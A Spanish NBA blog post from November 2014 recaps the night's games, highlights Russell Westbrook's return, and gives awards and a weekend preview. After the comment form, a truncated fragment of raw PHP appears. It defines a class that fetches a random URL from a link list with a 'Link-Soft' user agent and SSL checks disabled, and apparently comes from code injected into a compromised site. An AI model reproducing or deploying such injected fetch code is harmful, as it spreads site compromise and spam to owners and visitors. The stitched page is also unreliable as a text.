La Crónica: Westbrook en acción.

29 de November de 2014 por TheDeerHunter

Maratón de partidazos del Día de Acción de Gracias y nos os dejamos ni un mal post para comentar. No nos lo tengáis en cuenta. en esta ocasión fue debido a problemas técnicos y no a nuestra conocida indolencia. Para redimirnos habrá crónica en sábado aunque a estas horas ya tendréis todos bastante claro lo que ocurrió ayer.

Lo noticioso de la jornada fue la vuelta de Russell Westbrook a las pistas. Menudo regreso. Calderon fue vilmente destrozado por el ímpetu del guard allstar de los Thunder. Palizón sin paliativos que se llevaron los Knicks del Chesapeake, pabellón que sólo había experimentado sinsabores hasta la fecha. Con la próxima vuelta de Durant vuelve el coco y los playoffs en el Oeste van a ponerse mucho más caros. Que empiecen a mirar todos en su retrovisor, que vienen… Habrá que empezar a digerir que el corte en la conferencia puede estar perfectamente en un 65% de victorias.

Los Grizzlies cuentan con un cómodo margen que les exime de preocuparse aún por esto. Ayer Marc volvió a reivindicarse liderando otra solvente victoria nada menos que contra los Blazers, que estaban poco menos que intratables. No sirvió para abrir brecha con los Warriors, aunque estos pasaron las de Caín para amarrar el punto en Charlotte. No fue el artista Curry el principal artificiero, más fallón en la larga distancia que de costumbre. Lo fue Marrese Speights, en el mejor momento de su carrera. Uno de los culpables de los excelentes resultados del equipo este primer mes de campeonato. Y eso que sólo estivo 24 minutitos en pista, expulsado por faltas. Importante diatriba la que se le presenta a Kerr con la vuelta de David Lee.

Blake Griffin y los Clippers lo tuvieron fácil ante unos Rockets sin sus interiores titulares operativos. Marchan séptimos, pero ojo, con un balance del 67% y un 7-3 en los últimos 10. Por encima estan los Mavs, que se llevaron una valiosísima victoria de Canadá, con Monta Ellis en trance anotador. Los Spurs lograron su 6ª victoria consecutiva y la segunda seguida sin Popovich. Aprovecharon la baja de Cousins. Los Nuggets mantienen su particular escalada habiendo derrotado a Suns. En la cola de la conferencia los aficionados amarillos vieron atónitos cómo Zach LaVine le comía la tostada a su ídolo de niñez Kobe Bryant. Kobe estuvo excelente pero por primera vez en su carrera falló dos tiros libres en el filo de la navaja de un partido y, además, falló el clutch para ganar. Los Lakers son oficialmente el peor equipo de la conferencia.

En el Este los Bulls mostraron músculo en Boston con la vuelta de sus lesionados. Los Bucks le dieron un buen meneo a los inoperantes Pistons, y lo sorprendente es que fue el dúo Ilyasova-Dudley el ejecutor. Ojo que ahora mismo son cuartos. Los Hawks superaron a los Pelicans y Anthony Davis sufrió una de las noches más frustrantes de lo que va de año ante el potente juego interior rival. Finalmente Stuckey fue el mejor de los Pacers en su victoria ante Orlando.

PREMIOS

MVP: Russell Westbrook en su regreso. 32 puntos, 7 rebotes y 8 asistencias. Tener un bicharraco de estos o no tenerlo supone ganar partidos como el de ayer de paliza o sufrir e incluso perderlos.

Rookie: Zach LaVine tocando la guitarra ante Kobe Bryant. Aún en horas bajas el Staples sigue siendo un excelente escaparate para marcarte el partido de tu recién comenzada carrera.

Sorpresa: El partidazo que se marcaron Ersan Ilyasova y Jared Dudley debería de ser analizado en Cuarto Milenio.

Decepción: ¿Qué le pasa a Goran Dragic este año? El MIP del año pasado igual termina siendo el “Most Deteriorated Player of the Year”. Por debajo de los guarimos de hace dos campañas.

Esfuerzo en vano: Andre Drummond, resucitando. 26 puntos, 20 rebotazos… pero los Pistons siguen siendo una banda.

EL RESTO DEL FIN DE SEMANA

Sábado: Interesantísimo Pelicans@Wizards y habría que seguir de cerca el Rockets@Bucks. Los Mavs visitan Philadelphia; los Hornets difícil papeleta en Atlanta; LeBron recibe a Pacers rememorando duelos que parecen muy lejanos; por último los Clippers viajan a Salt Lake City.

Domingo: Partidos vespertinos: Spurs@Celtics, Bulls@Nets y Warriors@Pistons. Duelísimo entre Marc y Cousins si el segundo fuera de la partida. Heat visitan el Madison, Orlando@Phoenix y los Blazers reciben a los Wolves.

Que ustedes lo disfruten…

Comenta

Un comentario a esta entrada

  1. rumbero dice:
    #1

    Tela lo que ha hecho el abuelete de Kobe hace un ratito. Jugador más veterano de la historia en hacer un 30-10-10

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>